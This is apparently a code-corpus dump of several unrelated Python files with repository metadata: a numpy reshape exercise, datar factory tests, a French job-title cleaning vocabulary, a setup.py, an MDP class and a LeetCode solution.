| 32.282313 | 78 | 0.623011 | 1,153 | 9,491 | 4.960104 | 0.217693 | 0.040392 | 0.022032 | 0.009792 | 0.244448 | 0.204057 | 0.169785 | 0.137087 | 0.072915 | 0.072915 | 0 | 0.007361 | 0.270045 | 9,491 | 293 | 79 | 32.392491 | 0.818129 | 0.085555 | 0 | 0.278302 | 0 | 0 | 0.073177 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.009434 | 0.089623 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a196d336d93a22ab16f1f21a1b3e7182f45daa9b | 536 | py | Python | Python/Numpy/Shape and Reshape/shape_and_reshape.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | 2 | 2020-05-28T07:15:00.000Z | 2020-07-21T08:34:06.000Z | Python/Numpy/Shape and Reshape/shape_and_reshape.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | null | null | null | Python/Numpy/Shape and Reshape/shape_and_reshape.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | null | null | null | import numpy as np
from typing import List
def reshpare_to_square_matrix( seq:List)->None:
square_matrix = np.array( seq )
# reshpae to square matrix
square_matrix.shape = (3,3)
return square_matrix
if __name__ == '__main__':
int_sequence = list( map( int, input().split() ) )
# Method_#1
#sq_matrix = reshpare_to_square_matrix( int_sequence )
#print( sq_matrix )
# Method_#2
sq_matrix = np.array( int_sequence )
sq_matrix = np.reshape( sq_matrix, (3,3) )
print( sq_matrix )
| 20.615385 | 58 | 0.660448 | 75 | 536 | 4.346667 | 0.44 | 0.220859 | 0.128834 | 0.134969 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014599 | 0.233209 | 536 | 25 | 59 | 21.44 | 0.778589 | 0.210821 | 0 | 0 | 0 | 0 | 0.019277 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.363636 | 0.090909 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a19804bd039dd872f53c4d69a22088d534d74c39 | 8,153 | py | Python | tests/core/test_factory.py | pdwaggoner/datar | a03f1c0ca0de1270059178e59cea151a51a6e7aa | [
"MIT"
] | null | null | null | tests/core/test_factory.py | pdwaggoner/datar | a03f1c0ca0de1270059178e59cea151a51a6e7aa | [
"MIT"
] | null | null | null | tests/core/test_factory.py | pdwaggoner/datar | a03f1c0ca0de1270059178e59cea151a51a6e7aa | [
"MIT"
] | null | null | null | import inspect
import pytest
import numpy as np
from datar.core.backends.pandas import Categorical, DataFrame, Series
from datar.core.backends.pandas.testing import assert_frame_equal
from datar.core.backends.pandas.core.groupby import SeriesGroupBy
from datar.core.factory import func_factory
from datar.core.tibble import (
SeriesCategorical,
SeriesRowwise,
TibbleGrouped,
TibbleRowwise,
)
from datar.tibble import tibble
from ..conftest import assert_iterable_equal
def test_transform_default():
@func_factory("transform", "x")
def double(x):
return x * 2
# scalar
out = double(3)
assert out[0] == 6
out = double(np.array([1, 2], dtype=int))
assert_iterable_equal(out, [2, 4])
@func_factory("transform", "x")
def double(x):
return x * 2
out = double([1, 2])
assert_iterable_equal(out, [2, 4])
# default on series
x = Series([2, 3], index=["a", "b"])
out = double(x)
assert isinstance(out, Series)
assert_iterable_equal(out.index, ["a", "b"])
assert_iterable_equal(out, [4, 6])
# default on dataframe
x = DataFrame({"a": [3, 4]})
out = double(x)
assert isinstance(out, DataFrame)
assert_iterable_equal(out.a, [6, 8])
# default on seriesgroupby
x = Series([1, 2, 1, 2]).groupby([1, 1, 2, 2])
out = double(x)
assert isinstance(out, SeriesGroupBy)
assert_iterable_equal(out.obj, [2, 4, 2, 4])
assert out.grouper.ngroups == 2
# on tibble grouped
x = tibble(x=[1, 2, 1, 2], g=[1, 1, 2, 2]).group_by("g")
out = double(x)
# grouping variables not included
assert_iterable_equal(out.x.obj, [2, 4, 2, 4])
x = tibble(x=[1, 2, 1, 2], g=[1, 1, 2, 2]).rowwise("g")
out = double(x)
assert isinstance(out, TibbleRowwise)
assert_frame_equal(out, out._datar["grouped"].obj)
assert_iterable_equal(out.x.obj, [2, 4, 2, 4])
assert_iterable_equal(out.group_vars, ["g"])
def test_transform_register():
@func_factory(kind="transform", data_args="x")
def double(x):
return x * 2
@double.register(DataFrame)
def _(x):
return x * 3
x = Series([2, 3])
out = double(x)
assert_iterable_equal(out, [4, 6])
double.register(Series, lambda x: x * 4)
out = double(x)
assert_iterable_equal(out, [8, 12])
x = tibble(a=[1, 3])
out = double(x)
assert_iterable_equal(out.a, [3, 9])
out = double([1, 4])
assert_iterable_equal(out, [4, 16])
# register an available string func for tranform
double.register(SeriesGroupBy, "sum")
x = Series([1, -2]).groupby([1, 2])
out = double(x)
assert_iterable_equal(out.obj, [1, -2])
# seriesrowwise
double.register(SeriesRowwise, lambda x: x + 1)
x.is_rowwise = True
out = double(x)
assert_iterable_equal(out.obj, [2, -1])
assert out.is_rowwise
def test_transform_hooks():
@func_factory(kind="transform", data_args="x")
def times(x, t):
return x * t
with pytest.raises(ValueError):
times.register(Series, meta=False, pre=1, func=None)
times.register(
Series,
func=None,
pre=lambda x, t: (x, (-t,), {}),
post=lambda out, x, t: out + t,
)
x = Series([1, 2])
out = times(x, -1)
assert_iterable_equal(out, [2, 3])
@times.register(Series, meta=False)
def _(x, t):
return x + t
out = times(x, 10)
assert_iterable_equal(out, [11, 12])
@times.register(SeriesGroupBy, meta=True)
def _(x, t):
return x + 10
x = Series([1, 2, 1, 2]).groupby([1, 1, 2, 2])
out = times(x, 1)
assert_iterable_equal(out.obj, [11, 12, 11, 12])
times.register(
SeriesGroupBy,
func=None,
pre=lambda x, t: (x, (t + 1,), {}),
post=lambda out, x, *args, **kwargs: out,
)
out = times(x, 1)
assert_iterable_equal(out, [2, 4, 2, 4])
times.register(
Series,
func=None,
pre=lambda *args, **kwargs: None,
post=lambda out, x, t: out + t,
)
x = Series([1, 2])
out = times(x, 3)
assert_iterable_equal(out, [4, 5])
@times.register(DataFrame, meta=True)
def _(x, t):
return x ** t
x = tibble(a=[1, 2], b=[2, 3])
out = times(x, 3)
assert_iterable_equal(out.a, [1, 8])
assert_iterable_equal(out.b, [8, 27])
# TibbleGrouped
times.register(
TibbleGrouped,
func=None,
pre=lambda x, t: (x, (t - 1,), {}),
post=lambda out, x, t: out.reindex([1, 0]),
)
x = x.group_by("a")
out = times(x, 3)
assert_iterable_equal(out.b, [6, 4])
@times.register(
TibbleGrouped,
meta=False,
)
def _(x, t):
out = x.transform(lambda d, t: d * t, 0, t - 1)
out.iloc[0, 1] = 10
return out
# x = tibble(a=[1, 2], b=[2, 3]) # grouped by a
out = times(x, 3)
assert isinstance(out, TibbleGrouped)
assert_iterable_equal(out.group_vars, ["a"])
assert_iterable_equal(out.b.obj, [10, 6])
def test_agg():
men = func_factory(
"agg",
"a",
name="men",
func=np.mean,
signature=inspect.signature(lambda a: None),
)
x = [1, 2, 3]
out = men(x)
assert out == 2.0
x = Series([1, 2, 3])
out = men(x)
assert out == 2.0
# SeriesGroupBy
men.register(SeriesGroupBy, func="mean")
x = Series([1, 2, 4]).groupby([1, 2, 2])
out = men(x)
assert_iterable_equal(out.index, [1, 2])
assert_iterable_equal(out, [1.0, 3.0])
# SeriesRowwise
df = tibble(x=[1, 2, 4]).rowwise()
out = men(df.x)
assert_iterable_equal(out, df.x.obj)
men.register(SeriesRowwise, func="sum")
out = men(df.x)
assert_iterable_equal(out.index, [0, 1, 2])
assert_iterable_equal(out, [1.0, 2.0, 4.0])
# TibbleRowwise
x = tibble(a=[1, 2, 3], b=[4, 5, 6]).rowwise()
out = men(x)
assert_iterable_equal(out, [2.5, 3.5, 4.5])
# TibbleGrouped
x = tibble(a=[1, 2, 3], b=[4, 5, 5]).group_by("b")
out = men(x)
assert_iterable_equal(out.a, [1.0, 2.5])
def test_varargs_data_args():
@func_factory("agg", {"x", "args[0]"})
def mulsum(x, *args):
return (x + args[0]) * args[1]
out = mulsum([1, 2], 2, 3)
assert_iterable_equal(out, [9, 12])
@func_factory("agg", {"x", "args"})
def mulsum(x, *args):
return x + args[0] + args[1]
out = mulsum([1, 2], [1, 2], [2, 3])
assert_iterable_equal(out, [4, 7])
def test_dataargs_not_exist():
fun = func_factory("agg", "y")(lambda x: None)
with pytest.raises(ValueError):
fun(1)
def test_args_frame():
@func_factory("agg", {"x", "y"})
def frame(x, y, __args_frame=None):
return __args_frame
out = frame(1, 2)
assert_iterable_equal(sorted(out.columns), ["x", "y"])
def test_args_raw():
@func_factory("agg", {"x"})
def raw(x, __args_raw=None):
return x, __args_raw["x"]
outx, rawx = raw(1)
assert isinstance(outx, Series)
assert rawx == 1
def test_apply():
@func_factory("apply", "x")
def rn(x):
return tibble(x=[1, 2, 3])
x = tibble(a=[1, 2], b=[2, 3]).rowwise()
out = rn(x)
assert out.shape == (2,)
assert out.iloc[0].shape == (3, 1)
def test_no_func_registered():
fun = func_factory("agg", "x", func=lambda x: None)
with pytest.raises(ValueError):
fun.register(SeriesGroupBy, func=None, meta=False)
def test_run_error():
@func_factory("agg", "x")
def error(x):
raise RuntimeError
with pytest.raises(ValueError, match="registered function"):
error(1)
def test_series_cat():
@func_factory("agg", "x")
def sum1(x):
return x.sum()
@sum1.register(SeriesCategorical)
def _(x):
return x[0]
out = sum1([1, 2])
assert out == 3
out = sum1(Categorical([1, 2]))
assert out == 1
def test_str_fun():
sum2 = func_factory(
"agg",
"x",
name="sum2",
qualname="sum2",
func="sum",
signature=inspect.signature(lambda x: None),
)
assert sum2([1, 2, 3]) == 6
| 24.050147 | 69 | 0.577333 | 1,200 | 8,153 | 3.8 | 0.1125 | 0.017105 | 0.15 | 0.164035 | 0.491886 | 0.39057 | 0.319737 | 0.264693 | 0.133333 | 0.108333 | 0 | 0.044584 | 0.257206 | 8,153 | 338 | 70 | 24.121302 | 0.708388 | 0.036428 | 0 | 0.302419 | 0 | 0 | 0.020663 | 0 | 0 | 0 | 0 | 0 | 0.221774 | 1 | 0.120968 | false | 0 | 0.040323 | 0.060484 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a19fbb8c0d58c560088872b36cde005f0cdcc5c0 | 9,636 | py | Python | job_title_processing/ressources_txt/FR/cleaner/job.py | OnlineJobVacanciesESSnetBigData/JobTitleProcessing_FR | d5cf340e1a57d84562705a92b213333875be21f7 | [
"MIT"
] | 3 | 2020-10-25T17:44:50.000Z | 2021-12-11T22:28:18.000Z | job_title_processing/ressources_txt/FR/cleaner/job.py | OnlineJobVacanciesESSnetBigData/JobTitleProcessing_FR | d5cf340e1a57d84562705a92b213333875be21f7 | [
"MIT"
] | null | null | null | job_title_processing/ressources_txt/FR/cleaner/job.py | OnlineJobVacanciesESSnetBigData/JobTitleProcessing_FR | d5cf340e1a57d84562705a92b213333875be21f7 | [
"MIT"
] | 1 | 2020-11-19T12:44:25.000Z | 2020-11-19T12:44:25.000Z | # -*- coding: utf-8 -*-
jobwords = [
'nan',
'temps plein', 'temps complet', 'mi temps', 'temps partiel', # Part / Full time
'cherche', # look for
'urgent','rapidement', 'futur',
'job', 'offre', # Job offer
'trice', 'ère', 'eur', 'euse', 're', 'se', 'ème', 'trices', # Female endings
'ères', 'eurs', 'euses', 'res', 'fe', 'fes',# Female endings
've', 'ne', 'iere', 'rice', 'te', 'er', 'ice',
'ves', 'nes', 'ieres', 'rices', "tes", 'ices', # Female endings
'hf', 'fh', # Male/Female, Female/Male
'semaine', 'semaines', 'sem',
'h', 'heure', 'heures', 'hebdo', 'hebdomadaire', # Time (week, hour)
'année', 'mois', 'an', # Year
'jour', 'jours', # Day
'été', 'automne', 'hiver', 'printemps', # summer, winter ...
'lundi', 'mardi', 'mercredi', 'jeudi', 'vendredi', 'samedi', 'dimanche', # Week day
'janvier', 'février', 'mars', 'avril', 'mai', 'juin', # Month
'juillet', 'aout', 'septembre', 'octobre', 'novembre', 'décembre',
"deux", "trois", "quatre", "cinq", "six", "sept", # Number
"huit", "neuf", "dix", "onze", # Number
"euros", "euro", "dollars", "dollar", # Money
"super", # Pour éviter "super poids lourd"
# To clean
'caces', 'cap', 'bts', 'dea', 'diplôme', 'bac',
"taf", "ref", "poste", "pourvoir", "sein", "profil",
"possible",
'indépendant',
'saisonnier', 'alternance', 'alternant', 'apprenti',
'apprentissage', 'stagiaire', 'étudiant', 'fonctionnaire',
'intermittent', 'élève', 'freelance', "professionnalisation",
'partiel', 'cdd', 'cdi', 'contrat', 'pro',
"fpe", # Fonction publique d'état
'débutant', 'expérimenté', 'junior', 'senior',
'confirmé', 'catégorie',
'trilingue', 'bilingue',
'bi','international', 'france', 'national', 'régional',
'européen', 'emploi', 'non',
'exclusif', 'uniquement',
'permis', 'ssiap', 'bnssa',
]
job_replace_infirst = {
'3 d' : 'troisd',
'3d':'troisd',
'2 d': 'deuxd',
'2d':'deuxd',
'b to b': 'btob'
}
job_lemmas_expr = {
'cours particulier' : 'professeur',
'call center' : 'centre appels',
'vl pl vu' : 'poids lourd',
'front end' : 'informatique',
'back end' : 'informatique',
'homme femme' : '',
'femme homme' : ''
}
job_normalize_map = [
("indu", "industriel"),
("pl","poids lourd"),
("spl","poids lourd"),
("sav","service après vente"),
("unix","informatique"),
("windows","informatique"),
("php","informatique"),
("java","informatique"),
("python","informatique"),
("jee","informatique"),
("sap","informatique"),
("abap","informatique"),
("ntic","informatique"),
# ("c","informatique"),
("rh","ressources humaines"),
("vrd","voirie réseaux divers"),
("super poids lourd","poids lourd"),
("adv","administration des ventes"),
("cvv","chauffage climatisation"),
("agt","agent"),
("ash","agent des services hospitaliers"),
("ibode","infirmier de bloc opératoire"),
("aes","accompagnant éducatif et social"),
("ads","agent de sécurité"),
("amp","aide médico psychologique"),
("asvp","agent de surveillance des voies publiques"),
("cesf","conseiller en économie sociale et familiale"),
("babysitter","baby sitter"),
("babysitting","baby sitter"),
("sitting","sitter"),
("nounou", "nourrice"),
("coaching","coach"),
("webdesigner","web designer"),
("webmarketer","web marketer"),
("helpdesk","help desk"),
("prof","professeur"),
("maths", "mathématiques"),
("géo", "géographie"),
("philo", "philosophie"),
("epr","employe polyvalent de restauration"),
("NTIC","Informatique"),
("SIG","Systèmes d Information Géographique "),
("EPSCP","établissement public à caractère scientifique, culturel et professionnel "),
("NRBC","Nucléaire, Radiologique, Bactériologique, Chimique "),
("SAV","Service après vente"),
("ACIM ","Agent des Cabinets en Imagerie Médicale "),
("ASC","Agent des Services Commerciaux"),
("AEC","Agent d Escale Commerciale"),
("ASEM","Agent spécialisé des écoles maternelles "),
("TIC","Informatique"),
("HSE","Hygiène Sécurité Environnement "),
("ATER","Attaché temporaire d enseignement et de recherche "),
("AVS","Auxiliaire de Vie Sociale "),
("AIS","Auxiliaire d Intégration Scolaire"),
("ASV","Auxiliaire Spécialisé Vétérinaire "),
("AVQ","Auxiliaire Vétérinaire Qualifié"),
("IARD","Incendie, Accidents, Risques Divers "),
("NBC","Nucléaire, Bactériologique et Chimique"),
("PGC","Produits de Grande Consommation "),
("PNT","Personnel Navigant Technique "),
("PAO","Publication Assistée par Ordinateur"),
("TTA","toute arme"),
("VRD","Voiries et Réseaux Divers"),
("CMS","Composants Montés en Surface "),
("VSL","Véhicule Sanitaire Léger"),
("CIP","Conseiller d Insertion et de Probation "),
("CND","Contrôle Non Destructif "),
("MOA","Maîtrise d Ouvrage"),
("OPC","Ordonnancement, Pilotage et Coordination de chantier"),
("SPS","Sécurité, Protection de la Santé "),
("DAF","Directeur administratif et financier"),
("CHU","Centre Hospitalier Universitaire "),
("GSB","Grande Surface de Bricolage "),
("GSS","Grande Surface Spécialisée "),
("DOSI","Directeur de l Organisation et des Systèmes d Information "),
("ESAT","entreprise ou de Service d Aide par le Travail "),
("DRH","Directeur des Ressources Humaines "),
("DSI","Directeur des services informatiques "),
("DSPIP","Directeur des services pénitentiaires d insertion et de probation "),
("EPA","Etablissement Public à caractère Administratif "),
("EPST","Etablissement Public à caractère Scientifique et Technologique "),
("EPCC","Etablissement Public de Coopération Culturelle "),
("EPIC","Etablissement Public et Commercial "),
("IFSI","Institut de formation en soins infirmiers"),
("MAS","Machines à Sous "),
("SCOP","Société Coopérative Ouvrière de Production"),
(" EVS","Employée du Service Après Vente "),
("EVAT","Engagée Volontaire de l Armée de Terre "),
("EV","Engagé Volontaire "),
("GIR","Groupement d Individuels Regroupés "),
("CN","Commande Numérique "),
("SICAV","Société d Investissement à Capital Variable "),
("OPCMV","Organisme de Placement Collectif en Valeurs Mobilières "),
("OPCVM","Organisme de Placement Collectif en Valeurs Mobilières "),
("IADE","Infirmier Anesthésiste Diplômé d Etat "),
("IBODE","Infirmier de bloc opératoire Diplômé d Etat "),
("CTC","contrôle technique de construction "),
("IGREF","Ingénieur du génie rural des eaux et forêts "),
("IAA","Inspecteur d académie adjoint"),
("DSDEN","directeur des services départementaux de l Education nationale "),
("IEN","Inspecteur de l Education Nationale "),
("IET","Inspecteur de l enseignement technique "),
("ISPV","Inspecteur de Santé Publique Vétérinaire "),
("IDEN","Inspecteur départemental de l Education nationale "),
("IIO","Inspecteur d information et d orientation "),
("IGEN","Inspecteur général de l Education nationale "),
("IPR","Inspecteur pédagogique régional"),
("IPET","Inspecteur principal de l enseignement technique "),
("PNC","Personnel Navigant Commercial "),
("MPR","Magasin de Pièces de Rechange "),
("CME","Cellule, Moteur, Electricité "),
("BTP","Bâtiments et Travaux Publics "),
("EIR","Electricité, Instrument de bord, Radio "),
("MAR","Médecin Anesthésiste Réanimateur "),
("PMI","Protection Maternelle et Infantile "),
("MISP","Médecin Inspecteur de Santé Publique "),
("MIRTMO","Médecin Inspecteur Régional du Travail et de la Main d oeuvre "),
("DIM","Documentation et de l Information Médicale"),
("OPL","Officier pilote de ligne "),
("CN","commande numérique "),
("PPM","Patron Plaisance Moteur "),
("PPV","Patron Plaisance Moteur "),
("PhISP","Pharmacien Inspecteur de Santé Publique "),
("PDG","Président Directeur Général "),
("FLE","Français Langue Etrangère "),
("PLP","Professeur de lycée professionnel "),
("EPS","éducation physique et sportive "),
("PEGL","Professeur d enseignement général de lycée "),
("PEGC","Professeur d enseignement général des collèges "),
("INJS","instituts nationaux de jeunes sourds "),
("INJA","instituts nationaux de jeunes aveugles "),
("TZR","titulaire en zone de remplacement "),
("CFAO","Conception de Fabrication Assistée par Ordinateur "),
("SPIP","service pénitentiaire d insertion et de probation "),
("PME","Petite ou Moyenne Entreprise "),
("RRH","Responsable des Ressources Humaines "),
("QSE","Qualité Sécurité Environnement "),
("SASU","Secrétaire d administration scolaire et universitaire "),
("MAG","Metal Active Gas "),
("MIG","Metal Inert Gas "),
("TIG","Tungsten Inert Gas "),
("GED","Gestion électronique de documents"),
("CVM","Circulations Verticales Mécanisées "),
("TISF","Technicien Intervention Sociale et Familiale"),
("MAO","Musique Assistée par Ordinateur"),
# ("Paie","paye"),
# ("paies","paye"),
("ml","mission locale"),
("AS","aide soignant"),
("IDE","infirmier de soins généraux"),
("ERD","études recherche et développement")
]
| 42.263158 | 91 | 0.603881 | 970 | 9,636 | 5.992784 | 0.631959 | 0.004645 | 0.008257 | 0.01445 | 0.038706 | 0.016515 | 0.016515 | 0 | 0 | 0 | 0 | 0.000658 | 0.211499 | 9,636 | 227 | 92 | 42.449339 | 0.764412 | 0.03435 | 0 | 0.019417 | 0 | 0 | 0.653701 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.004854 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1a133f4a1f010df28c349cd5d84226826c23e63 | 1,631 | py | Python | setup.py | cardosan/tempo_test | ff5a757c9ca54e5af1ccd71e9e5840bac279e4f0 | [
"BSD-3-Clause"
] | null | null | null | setup.py | cardosan/tempo_test | ff5a757c9ca54e5af1ccd71e9e5840bac279e4f0 | [
"BSD-3-Clause"
] | null | null | null | setup.py | cardosan/tempo_test | ff5a757c9ca54e5af1ccd71e9e5840bac279e4f0 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
import io
setup(
name='bw2temporalis',
version="0.9.2",
packages=[
"bw2temporalis",
"bw2temporalis.tests",
"bw2temporalis.examples",
"bw2temporalis.cofire"
],
author="Chris Mutel",
author_email="cmutel@gmail.com",
license=io.open('LICENSE.txt', encoding='utf-8').read(),
url="https://bitbucket.org/cmutel/brightway2-temporalis",
install_requires=[
"arrow",
"eight",
"brightway2",
"bw2analyzer",
"bw2calc>=0.11",
"bw2data>=0.12",
"bw2speedups>=2.0",
"numexpr",
"numpy",
"scipy",
"stats_arrays",
],
description='Provide a dynamic LCA calculations for the Brightway2 life cycle assessment framework',
long_description=io.open('README.rst', encoding='utf-8').read(),
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Visualization',
],
)
| 32.62 | 104 | 0.591048 | 152 | 1,631 | 6.315789 | 0.657895 | 0.079167 | 0.104167 | 0.033333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02579 | 0.263029 | 1,631 | 49 | 105 | 33.285714 | 0.772879 | 0 | 0 | 0.0625 | 0 | 0 | 0.582465 | 0.053955 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1a36361a953bc1ab0c48721b0d1db387eabef20 | 6,139 | py | Python | MDP/MDP.py | ADP-Benchmarks/ADP-Benchmark | aea3d1be7c28c7290a23e731b9e7b460ee6976f7 | [
"MIT"
] | 1 | 2020-01-17T17:09:46.000Z | 2020-01-17T17:09:46.000Z | MDP/MDP.py | ADP-Benchmarks/ADP-Benchmark | aea3d1be7c28c7290a23e731b9e7b460ee6976f7 | [
"MIT"
] | null | null | null | MDP/MDP.py | ADP-Benchmarks/ADP-Benchmark | aea3d1be7c28c7290a23e731b9e7b460ee6976f7 | [
"MIT"
] | 2 | 2020-10-26T04:51:42.000Z | 2020-11-22T20:20:30.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
GitHub Homepage
----------------
https://github.com/ADP-Benchmarks
Contact information
-------------------
ADP.Benchmarks@gmail.com.
License
-------
The MIT License
"""
from MDP.spaces.space import Space
from MDP.transition import Transition
from MDP.objective import Objective
import copy
class MDP:
"""
Description
-----------
This class provides a generic implementation for continuous- and
discrete- state MDPs. Finite and infinite -time horizon MDPs as
well as average- and discounted- cost MDPs can be handled.
"""
def __init__(self, initState = None,
sSpace = None,
aSpace = None,
nSpace = None,
transition = None,
objective = None,
isFiniteHorizon = False,
isAveCost = False,
terminalStates=None,):
"""
Inputs
------
initState [list]: initial state vector, that is the list of
components of the starting state.
sSpace [Space]: MDP state space.
aSpace [Space]: MDP action space.
nSpace [Space]: MDP exogenous noise space.
transition [Transition]: MDP stochastic kernel (e.g., MDP
transition matrix for discrete MDPs).
objective [Objective]: the MDP cost/reward function.
isFiniteHorizon [int]: if int, MDP is finite-time horizon of length
isFiniteHorizon, else if False,
it is infinite-time horizon.
isAveCost [bool]: if True, MDP is average-cost, else it is
discounted-cost.
terminalStates [list]: list of absorbing state for episodic MDPs
Raises/Returns
--------------
Explanations
------------
The constructor of MDP class.
"""
# assert(isinstance(sSpace,Space))
# assert(isinstance(aSpace,Space))
# assert(isinstance(nSpace,Space))
assert(isinstance(transition,Transition))
assert(isinstance(objective,Objective))
assert sSpace.isStateFeasble(initState), 'Intial state should belong to\
the state space'
#TODO initState -> initDist
self.initState = initState
self.terminalStates = terminalStates
self.sSpace = sSpace
self.aSpace = aSpace
self.nSpace = nSpace
self.sDim = self.sSpace.dim
self.aDim = self.aSpace.dim
self.nDim = self.nSpace.dim
self.transition = transition
self.objective = objective
self.isFiniteHorizon = isFiniteHorizon
self.isAveCost = isAveCost
self.reset()
def step(self, action, force_noise=None):
'''
Takes one step in the MDP.
--------------------------
Inputs
------
action [list]: current action vector, that is the list of
components of the current action
force_noise [list]: optional, an exogenous noise vector used to
evaluate next state and reward. If not provided,
the noise vector will be sampled randomly
Returns
-------
nextState [list]: next state at t+1
reward [float]: Scalar reward/cost
done [boolean]: True if an absorbing state is reached,
for the case of absorbing MDPs
info [dict]: Provides info about the noise outcome and current period
in the finite horizon case
'''
#TODO This function should support generating a list of next states
if not force_noise:
noise = self.nSpace.sample()[0]
else:
noise = force_noise
nextState = self.transition.getNextStateWithExoSamples(self.currState,
action,
noise)
reward = self.objective.getObjectiveWithExoSamples(self.currState,
action,
noise)
self.currState = nextState
if self.isFiniteHorizon:
# Increment the period
self.t += 1
if self.t >= self.isFiniteHorizon:
self.reset()
return nextState, reward, {'t': self.t, 'noise': noise}
# Infinite horizon MDP
elif self.terminalStates:
done = nextState in self.terminalStates
return nextState, reward, done, {'noise': noise}
else:
return nextState, reward, {'noise': noise}
def reset(self,):
'''
Resets the state back to the initial state
------------------------------------------
Returns
-------
initState [list]: initial state vector, that is the list of
components of the starting state.
t [int]: starting period t for finit horizon MDPs
'''
self.currState = copy.deepcopy(self.initState)
if self.isFiniteHorizon:
self.t = 0
return (self.currState,self.t)
else:
return self.currState
| 32.654255 | 80 | 0.468154 | 521 | 6,139 | 5.50096 | 0.299424 | 0.027216 | 0.012561 | 0.015701 | 0.064201 | 0.064201 | 0.064201 | 0.064201 | 0.064201 | 0.05164 | 0 | 0.001767 | 0.446815 | 6,139 | 187 | 81 | 32.828877 | 0.842167 | 0.443069 | 0 | 0.183333 | 0 | 0 | 0.005702 | 0 | 0 | 0 | 0 | 0.010695 | 0.05 | 1 | 0.05 | false | 0 | 0.066667 | 0 | 0.216667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1ac73057ccc5855df2d0931ac3ee0a8a54ddd18 | 855 | py | Python | python-algorithm/leetcode/problem_457.py | isudox/nerd-algorithm | c1fbe153953cf3fc24395f75d102016fdf9ea0fa | [
"MIT"
] | 5 | 2017-06-11T09:19:34.000Z | 2019-01-16T16:58:31.000Z | python-algorithm/leetcode/problem_457.py | isudox/leetcode-solution | 60085e64deaf396a171367affc94b18114565c43 | [
"MIT"
] | 5 | 2020-03-22T13:53:54.000Z | 2020-03-23T08:49:35.000Z | python-algorithm/leetcode/problem_457.py | isudox/nerd-algorithm | c1fbe153953cf3fc24395f75d102016fdf9ea0fa | [
"MIT"
] | 1 | 2019-03-02T15:50:43.000Z | 2019-03-02T15:50:43.000Z | """457. Circular Array Loop
https://leetcode.com/problems/circular-array-loop/
"""
from typing import List
class Solution:
def circular_array_loop(self, nums: List[int]) -> bool:
def helper(start: int, cur: int, count: int, visited) -> int:
if nums[cur] * nums[start] < 0:
return False
if cur == start and count > 0:
return count > 1
if cur in visited:
return False
visited.add(cur)
next_pos = cur + nums[cur]
count += 1
if 0 <= next_pos < len(nums):
return helper(start, next_pos, count, visited)
return helper(start, next_pos % len(nums), count, visited)
for i in range(len(nums)):
if helper(i, i, 0, set()):
return True
return False
